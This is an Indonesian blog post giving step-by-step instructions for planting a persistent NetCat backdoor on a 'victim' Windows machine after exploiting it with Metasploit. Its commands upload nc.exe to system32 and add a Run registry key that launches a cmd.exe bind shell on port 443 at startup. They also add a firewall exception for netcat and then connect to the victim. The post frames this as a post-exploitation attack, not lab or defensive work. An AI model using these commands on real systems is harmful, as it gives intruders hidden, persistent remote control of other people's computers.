Wednesday, February 1, 2012

Backdoor dengan NetCat



Setelah sukses mengeksploit komputer korban... langkah selanjutnya yang patut dipikirkan adalah nge Backdoor komputer korban.. kali ini saya akan mencoba mengunakan NetCat untuk nge backdoor komputer korban..

Yang dibutuhkan adalah Netcat sebagai Backdoor nya download disini

Pertama-tama pastinya kita harus mendapatkan Session meterpreter mengunakan metasploit..selanjutnya kita meng Upload Netcat ke komputer korban..

Upload /root/nc.exe C:\\windows\\system32

langkah selanjutnya kita mengset registy NetCat start up dan membuka port 443. dengan mengedit registry "HKLM\software\microsoft\windows\currentversion\run". 

Enumerate registry key : reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run


selanjutnya meng add NetCat dalam registry 

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
Cek, apakah sudah terset dalam registry
 reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

Setelah semuanya telah tersetting... langkah selanjutnya meng add Netcat ke dalam Firewall supaya tidak terblok oleh firewall..

meterpreter > shell



C:\WINDOWS\system32> netsh

netsh > firewall add allowedprogram program=C:\WINDOWS\System32\nc.exe name=netcat mode=enable scope=all


Setelah semuanya ter-setup, dan apabila kita ingin menjalankan backdoor nya cukup dengan perintah: nc -v ip_korban port








upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

Read more : file:///C:/Users/Flames/Downloads/10%20Steps%20to%20Use%20NetCat%20as%20a%20Backdoor%20in%20Windows%207%20System%20_%20Vishnu%20Valentino%20Ethical%20Hacking%20Tutorial,%20Security%20Tips%20and%20Trick.htm

No comments:

Post a Comment